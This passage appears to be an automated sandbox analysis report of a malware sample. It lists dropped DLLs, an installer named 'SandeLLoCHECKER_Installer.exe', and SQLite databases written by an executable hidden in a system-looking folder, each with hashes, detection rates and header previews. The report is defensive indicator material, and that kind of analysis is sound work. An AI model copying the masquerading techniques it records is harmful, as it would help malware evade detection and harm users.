                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI44B9.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1117504
                                                                                                                      Entropy (8bit):6.484489639550344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:96KyJqotyEbjgE3pr9CxKoibHCMm7HH4d5+u+Tx5KzEKrbsUT1wZS:d+qotJCxKoibHCNbH4d5+u+Tx5KzEKrP
                                                                                                                      MD5:C04ED00DDCB3518E8CF6DB24DB294A50
                                                                                                                      SHA1:CC98CC3AB9C4371F85EA227D9F761BAB4AA76BAA
                                                                                                                      SHA-256:3C21E1F3BB3EBEB5F0FF68658DB8ABD18B62F8B195288C4BF87936FC51F8AE9E
                                                                                                                      SHA-512:736946A3130F294878EA51145960017BABCC1B8AC2C96AFD8B9E2A4D120F173AFB84BBD04B6F0113F286D4BC671BEFECD4E92C582F1DE1A0D5BC8738C3CAE9C5
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.2;..a;..a;..a.n.`6..a.n.`...a.`.`*..a.`.`,..a.`.`h..a.n.`"..a.n.`$..a;..a...a.a.`...a.a.`:..a.aEa:..a;.-a:..a.a.`:..aRich;..a........................PE..L...."od.........."!...#.T...........U.......p............................... .......e....@.........................`...t..............................@=......`>..h...p...............................@............p..4............................text....S.......T.................. ..`.rdata...U...p...V...X..............@..@.data...@...........................@....rsrc...............................@..@.reloc..`>.......@..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI46ED.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):726840
                                                                                                                      Entropy (8bit):6.453439210931193
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:jn6hflHZVr6xVYUiONE4i1uDiSNrETsc4UYK/DAt5c1+vn2eFzLT:mUTxipSxETsNV35c8vn2mzLT
                                                                                                                      MD5:EB7811666AC7BE6477E23AF68511424F
                                                                                                                      SHA1:1623579C5A3710DCC694A2FD49DEFA27D56D9175
                                                                                                                      SHA-256:AD706739B04256B9215E80D2D030863A37F0D7FD0E4071D0A3A73D6704D8BD8F
                                                                                                                      SHA-512:3055BAA15C92F476513C66A423043DC4B8C5F83F47643AD77665D6A2F823F4655BF4AE241D8AF4BC34D53630DF1C35989F0B11B934A631960668FCC7A8C81A7B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................k...x.....x...........x........................................I.....!..........Rich...........PE..L....!od.........."!...#.............}....................................... .......=....@.........................PM......lN..........h...............8=.......n..h@..p....................A..........@....................K..@....................text...,........................... ..`.rdata..Rb.......d..................@..@.data....'...p.......N..............@....rsrc...h............d..............@..@.reloc...n.......p...j..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI47C9.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:modified
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4969.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4A36.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4A94.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4B03.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4C8A.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4D85.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):726840
                                                                                                                      Entropy (8bit):6.453439210931193
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:jn6hflHZVr6xVYUiONE4i1uDiSNrETsc4UYK/DAt5c1+vn2eFzLT:mUTxipSxETsNV35c8vn2mzLT
                                                                                                                      MD5:EB7811666AC7BE6477E23AF68511424F
                                                                                                                      SHA1:1623579C5A3710DCC694A2FD49DEFA27D56D9175
                                                                                                                      SHA-256:AD706739B04256B9215E80D2D030863A37F0D7FD0E4071D0A3A73D6704D8BD8F
                                                                                                                      SHA-512:3055BAA15C92F476513C66A423043DC4B8C5F83F47643AD77665D6A2F823F4655BF4AE241D8AF4BC34D53630DF1C35989F0B11B934A631960668FCC7A8C81A7B
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................k...x.....x...........x........................................I.....!..........Rich...........PE..L....!od.........."!...#.............}....................................... .......=....@.........................PM......lN..........h...............8=.......n..h@..p....................A..........@....................K..@....................text...,........................... ..`.rdata..Rb.......d..................@..@.data....'...p.......N..............@....rsrc...h............d..............@..@.reloc...n.......p...j..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4DB5.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):1117504
                                                                                                                      Entropy (8bit):6.484489639550344
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:24576:96KyJqotyEbjgE3pr9CxKoibHCMm7HH4d5+u+Tx5KzEKrbsUT1wZS:d+qotJCxKoibHCNbH4d5+u+Tx5KzEKrP
                                                                                                                      MD5:C04ED00DDCB3518E8CF6DB24DB294A50
                                                                                                                      SHA1:CC98CC3AB9C4371F85EA227D9F761BAB4AA76BAA
                                                                                                                      SHA-256:3C21E1F3BB3EBEB5F0FF68658DB8ABD18B62F8B195288C4BF87936FC51F8AE9E
                                                                                                                      SHA-512:736946A3130F294878EA51145960017BABCC1B8AC2C96AFD8B9E2A4D120F173AFB84BBD04B6F0113F286D4BC671BEFECD4E92C582F1DE1A0D5BC8738C3CAE9C5
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}.2;..a;..a;..a.n.`6..a.n.`...a.`.`*..a.`.`,..a.`.`h..a.n.`"..a.n.`$..a;..a...a.a.`...a.a.`:..a.aEa:..a;.-a:..a.a.`:..aRich;..a........................PE..L...."od.........."!...#.T...........U.......p............................... .......e....@.........................`...t..............................@=......`>..h...p...............................@............p..4............................text....S.......T.................. ..`.rdata...U...p...V...X..............@..@.data...@...........................@....rsrc...............................@..@.reloc..`>.......@..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\MSI4DD5.tmp

                                                                                                                      Download File
                                                                                                                      Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):601920
                                                                                                                      Entropy (8bit):6.468846675265772
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12288:q+zdBoU6TPAjp66Ulgc2WGz5QCxOWIGv7:pBoBTopk1BGz5nsWIGv7
                                                                                                                      MD5:9E0AEF52F6C03B2FEA067342D9D4F22F
                                                                                                                      SHA1:D4431A858C8A7A79315829EC7AA82E838C2714F4
                                                                                                                      SHA-256:42B8ADAFCB4E8496D9822A0C504F449E56456528A9251C153381D3F63D197E5B
                                                                                                                      SHA-512:42858A6695D7906B3DF4DC97F3B1FAC737633A51FFB52E8EC8EDDEB21F8CDB53C199BB698E54C4A931155EAFD879DE6FFF114B84F298C84436B776E286EBEEB1
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......|.J.8.$.8.$.8.$...'.5.$...!.$.. .).$..'./.$..!.r.$... .!.$...".9.$...%...$.8.%.$...-.R.$...$.9.$.....9.$.8...9.$...&.9.$.Rich8.$.........................PE..L....!od.........."!...#.<...........W.......P...............................0......H.....@..........................W..d....a..,.......................@=...... h......p..............................@............P..l............................text....:.......<.................. ..`.rdata..:,...P.......@..............@..@.data... %...........n..............@....rsrc................~..............@..@.reloc.. h.......j..................@..B........................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\SandeLLoCHECKER_Installer.exe

                                                                                                                      Download File
                                                                                                                      Process:C:\Users\user\Desktop\gorkmTnChA.exe
                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):5973672
                                                                                                                      Entropy (8bit):7.301554910776435
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:98304:IrvLO010gIuekBbIAAvoTeU0q4ekVbu8sGL3sY5eVrPL3NeJm6Nib:ELO0Ejc4egHsu8Y5e3km6Ns
                                                                                                                      MD5:8A0591A6B534E32FA179F2D781B79026
                                                                                                                      SHA1:61E1AFF6F862CBCE0E1F6E9E70D186E5013D9846
                                                                                                                      SHA-256:4DF8350850592B587C4D2AAABDDC8454BC4652DF0082B85C3336139A9C6EA53E
                                                                                                                      SHA-512:0A261AFD07A152E0F4E7D4DF8AD0D57C53E9690B0B4F7ED13614B60C55466BAFA7AC70472F6B1B5B41E49B249F080AD3C4D440B655B631B17C3C7E1CEA3055BD
                                                                                                                      Malicious:true
                                                                                                                      Antivirus:
                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}..O...O...O..6=...O..6=..^O..6=...O..Z3...O..Z3...O..Z3..O..6=...O..6=...O..6=...O...O...M..<2..N..<2...O...O...O..<2...O..Rich.O..........PE..L.....od.........."....#..%..........h........%...@..........................@5.......[...@.................................L...(...../...............[.......2.....H.(.p.....................(.....P.&.@.............%......}..`....................text.....%.......%................. ..`.rdata..2.....%.......%.............@..@.data............:..................@....rsrc........./.....................@..@.reloc........2.......1.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\Sl45SGNwVW

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\TUvZ9UE0NY

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):20480
                                                                                                                      Entropy (8bit):0.5707520969659783
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\U3e4dGJbP5

                                                                                                                      Download File
                                                                                                                      Process:C:\bridgeMonitorDhcpCommon\webDriverintoDll.exe
                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):25
                                                                                                                      Entropy (8bit):4.0536606896881855
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:3:X+EEy+X:Odn
                                                                                                                      MD5:81FA203DC73EFBDB4CE97F240349F9C6
                                                                                                                      SHA1:D7F82D77CD282504483C33DE4B4CA276FCF2DFB6
                                                                                                                      SHA-256:3F620ED5E52BDFE1388805786CF28CAF97A1509CFDDC9B088E0762CFF189855E
                                                                                                                      SHA-512:A04B75CA8ACFFAF7ADA51A80E7EB290911F6D4CC06A02873D317288D985A0CC3F2E2C18C44A8B75A05D42DADF59758C0CE0CB270972C16A9D004B66E8B6822A3
                                                                                                                      Malicious:false
                                                                                                                      Preview:5VurYdYlrKKnxEbBViqZlWuNr

                                                                                                                      C:\Users\user\AppData\Local\Temp\aL4EyWwIy8

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):49152
                                                                                                                      Entropy (8bit):0.8180424350137764
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\asqorgoQB6

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):114688
                                                                                                                      Entropy (8bit):0.9746603542602881
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                      Malicious:false
                                                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                      C:\Users\user\AppData\Local\Temp\fj6oAMbNf0

                                                                                                                      Download File
                                                                                                                      Process:C:\Program Files (x86)\Reference Assemblies\Microsoft\KAdpNCgonFhCnlBRasdZerWl.exe
                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                      Category:dropped
                                                                                                                      Size (bytes):40960
                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                      Encrypted:false
                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
